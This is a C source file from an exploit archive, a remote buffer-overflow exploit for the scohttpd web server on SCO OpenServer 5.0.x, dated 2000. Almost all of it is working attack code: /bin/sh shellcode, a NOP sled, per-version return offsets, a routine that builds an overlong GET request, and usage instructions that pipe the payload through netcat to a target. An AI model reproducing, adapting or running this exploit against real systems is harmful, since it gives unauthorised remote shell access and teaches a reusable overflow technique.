Scounix httpd Remote Exploit.
2c39cd377679ecd20589d8a506037fa51a0ab54473f32e86a9cb4167b478f1b9
/*
* <scohttpx.c> Remote exploit
*
* Offset: /var/scohttp/scohttpd
* 0 -> OpenServer 5.0.4
* 0 -> OpenServer 5.0.2
* 600 -> OpenServer 5.0.5
*
* scosysv:~# /var/scohttp/scohttpd -v
* scohttpd version NCSA/1.3.
*
* Usage:
* $ cc scohttpx.c -o scohttpx
* $ (scohttpx 0;cat) | nc 1.1.1.1 457
*/
#include <stdlib.h>
#include <stdio.h>
char hell[]=
"\xeb\x1b" // start: jmp uno
"\x5e" // dos: popl %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x89\x5e\x07" // movb %bl,0x7(%esi)
"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"\x88\x5e\x11" // movb %bl,0x11(%esi)
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3b" // movb $0x3b,%al
"\x8d\x7e\x07" // leal 0x07(%esi),%edi
"\x89\xf9" // movl %edi,%ecx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x56" // pushl %esi
"\x56" // pushl %esi
"\xeb\x10" // jmp execve
"\xe8\xe0\xff\xff\xff" // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
#define OFF 0x803d688 // SCO OpenServer 5.0.4
#define ALINEA 3
#define LEN 400
int main(int argc, char *argv[]) {
int offset=0;
char buf[LEN];
int i;
if(argc < 2) {
printf("Usage: scohttpx <offset>\n");
exit(0);
}
else {
offset=atoi(argv[1]);
}
memset(buf,0x90,LEN);
memcpy(buf+140,hell,strlen(hell));
for(i=200+ALINEA;i<LEN-4;i+=4)
*(int *)&buf[i]=OFF+offset;
printf("GET ");
for(i=0;i<LEN;i++)
putchar(buf[i]);
putchar('\n');
exit(0);
}
/* www.hack.co.za [26 September 2000]*/